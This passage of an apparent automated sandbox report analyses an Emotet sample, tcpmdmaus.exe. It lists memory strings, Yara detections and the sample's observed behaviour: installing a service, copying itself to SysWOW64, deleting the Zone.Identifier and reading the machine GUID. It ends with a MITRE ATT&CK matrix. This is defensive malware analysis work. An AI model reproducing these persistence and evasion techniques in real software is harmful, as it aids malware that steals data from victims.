,"MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6
Source: svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6
Source: svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6

Source: svchost.exe, 0000000E.00000002.477891576.0000012F64B00000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.743701723.000001FADEA8A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000000E.00000002.477596789.0000012F642E7000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.743601011.000001FADEA18000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 00000013.00000002.742566259.000001FAD92A8000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.microsoft.co
Source: svchost.exe, 00000013.00000002.742566259.000001FAD92A8000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/r
Source: svchost.exe, 00000013.00000002.742566259.000001FAD92A8000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration
Source: svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/e5f6356f-80b5-47df-960c-a214cf301822/55652
Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000000E.00000003.458714124.0000012F65020000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.458593485.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000E.00000003.465086974.0000012F64BB8000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy
Source: svchost.exe, 0000000E.00000003.459588748.0000012F65002000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: unknown

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 5_2_00CD16D8 InternetReadFile,

5_2_00CD16D8

Source: tcpmdmaus.exe, 00000000.00000002.372082476.000000000096A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 6.2.sharedconnect.exe.860000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sharedconnect.exe.1480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.tcpmdmaus.exe.cd0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.tcpmdmaus.exe.950000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2195 CryptImportKey,LocalFree,CryptReleaseContext,		5_2_00CD2195
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_01482195 CryptImportKey,LocalFree,CryptReleaseContext,		7_2_01482195

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 6.2.sharedconnect.exe.860000.2.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 7.2.sharedconnect.exe.1480000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 5.2.tcpmdmaus.exe.cd0000.2.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 0.2.tcpmdmaus.exe.950000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet Payload Author: kevoreilly
Source: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet Payload Author: kevoreilly
Source: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet Payload Author: kevoreilly
Source: 00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet Payload Author: kevoreilly
Source: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet Payload Author: kevoreilly

Source: tcpmdmaus.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 6.2.sharedconnect.exe.860000.2.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 7.2.sharedconnect.exe.1480000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 5.2.tcpmdmaus.exe.cd0000.2.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 0.2.tcpmdmaus.exe.950000.3.unpack, type: UNPACKEDPE	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload

Source: C:\Users\user\Desktop\tcpmdmaus.exe

File deleted: C:\Windows\SysWOW64\sharedconnect.exe:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\sharedconnect.exe

File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache

Jump to behavior

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 5_2_00CD1F76 CreateProcessAsUserW,

5_2_00CD1F76

Source: tcpmdmaus.exe, 00000000.00000000.345083706.00000000003F3000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameRTNicProp.dll4 vs tcpmdmaus.exe
Source: tcpmdmaus.exe, 00000005.00000000.370086170.00000000003F3000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameRTNicProp.dll4 vs tcpmdmaus.exe
Source: tcpmdmaus.exe	Binary or memory string: OriginalFilenameRTNicProp.dll4 vs tcpmdmaus.exe

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 5_2_00CD80BC _snwprintf,OpenServiceW,DeleteService,CloseServiceHandle,

5_2_00CD80BC

Source: tcpmdmaus.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_EXPORT size: 0xfffff000 address: 0x0

Source: tcpmdmaus.exe	Virustotal: Detection: 85%
Source: tcpmdmaus.exe	Metadefender: Detection: 16%
Source: tcpmdmaus.exe	ReversingLabs: Detection: 96%

Source: tcpmdmaus.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\tcpmdmaus.exe 'C:\Users\user\Desktop\tcpmdmaus.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Process created: C:\Users\user\Desktop\tcpmdmaus.exe C:\Users\user\Desktop\tcpmdmaus.exe
Source: unknown	Process created: C:\Windows\SysWOW64\sharedconnect.exe C:\Windows\SysWOW64\sharedconnect.exe
Source: C:\Windows\SysWOW64\sharedconnect.exe	Process created: C:\Windows\SysWOW64\sharedconnect.exe C:\Windows\SysWOW64\sharedconnect.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Process created: C:\Users\user\Desktop\tcpmdmaus.exe C:\Users\user\Desktop\tcpmdmaus.exe	Jump to behavior
Source: C:\Windows\SysWOW64\sharedconnect.exe	Process created: C:\Windows\SysWOW64\sharedconnect.exe C:\Windows\SysWOW64\sharedconnect.exe	Jump to behavior

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal84.troj.evad.winEXE@11/4@0/9

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,		5_2_00CD8142
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,		7_2_01488142

Source: C:\Users\user\Desktop\tcpmdmaus.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 5_2_00CD81DF ChangeServiceConfig2W,

5_2_00CD81DF

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 0_2_00951B40 CreateToolhelp32Snapshot,

0_2_00951B40

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\MAF72BC4A
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Mutant created: \Sessions\1\BaseNamedObjects\PEMD70
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Mutant created: \Sessions\1\BaseNamedObjects\PEM14F8
Source: C:\Windows\SysWOW64\sharedconnect.exe	Mutant created: \BaseNamedObjects\Global\IAF72BC4A
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\IAF72BC4A

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: tcpmdmaus.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: tcpmdmaus.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: ewjrRWJW##@HRh.pdb source: tcpmdmaus.exe

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 0_2_003D2E75 push ecx; ret	0_2_003D2E98
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_003D2E75 push ecx; ret	5_2_003D2E98
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 6_2_003D2E75 push ecx; ret	6_2_003D2E98
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_003D2E75 push ecx; ret	7_2_003D2E98

Source: tcpmdmaus.exe	Static PE information: section name: .bT
Source: tcpmdmaus.exe	Static PE information: section name: D
Source: tcpmdmaus.exe	Static PE information: section name: .crt0
Source: tcpmdmaus.exe	Static PE information: section name: cji8

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 0_2_00951966 LoadLibraryA,GetProcAddress,

0_2_00951966

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\SysWOW64\sharedconnect.exe

Executable created and started: C:\Windows\SysWOW64\sharedconnect.exe

Jump to behavior

Source: C:\Users\user\Desktop\tcpmdmaus.exe

PE file moved: C:\Windows\SysWOW64\sharedconnect.exe

Jump to behavior

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 5_2_00CD81F7 StartServiceW,CloseServiceHandle,CloseServiceHandle,

5_2_00CD81F7

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\tcpmdmaus.exe

File opened: C:\Windows\SysWOW64\sharedconnect.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\sharedconnect.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sharedconnect.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sharedconnect.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sharedconnect.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 5704	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6920	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: EnumServicesStatusExW,GetTickCount,OpenServiceW,	5_2_00CD7F4D
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: EnumServicesStatusExW,GetLastError,	5_2_00CD7EF4
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: EnumServicesStatusExW,GetTickCount,OpenServiceW,	7_2_01487F4D
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: EnumServicesStatusExW,GetLastError,	7_2_01487EF4

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\sharedconnect.exe

API call chain: ExitProcess graph end node

graph_7-2875

Source: C:\Users\user\Desktop\tcpmdmaus.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 00000013.00000002.743677693.000001FADEA62000.00000004.00000001.sdmp	Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 0000000E.00000002.477596789.0000012F642E7000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.742209194.000001FAD922A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 0_2_00951966 LoadLibraryA,GetProcAddress,

0_2_00951966

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 0_2_009518C0 GetProcessHeap,RtlFreeHeap,

0_2_009518C0

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 0_2_00952010 mov eax, dword ptr fs:[00000030h]	0_2_00952010
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 0_2_009515E0 mov eax, dword ptr fs:[00000030h]	0_2_009515E0
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2010 mov eax, dword ptr fs:[00000030h]	5_2_00CD2010
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD15E0 mov eax, dword ptr fs:[00000030h]	5_2_00CD15E0
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_014815E0 mov eax, dword ptr fs:[00000030h]	7_2_014815E0
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_01482010 mov eax, dword ptr fs:[00000030h]	7_2_01482010

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\sharedconnect.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\sharedconnect.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\tcpmdmaus.exe

Code function: 0_2_0095261F RtlGetVersion,GetNativeSystemInfo,

0_2_0095261F

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 6.2.sharedconnect.exe.860000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sharedconnect.exe.1480000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.tcpmdmaus.exe.cd0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.tcpmdmaus.exe.950000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.372046233.0000000000951000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.402858488.0000000000861000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.403460556.0000000000CD1000.00000020.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Service Execution12	Valid Accounts1	Valid Accounts1	Masquerading12	Input Capture1	Security Software Discovery21	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API1	Windows Service12	Access Token Manipulation1	Valid Accounts1	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
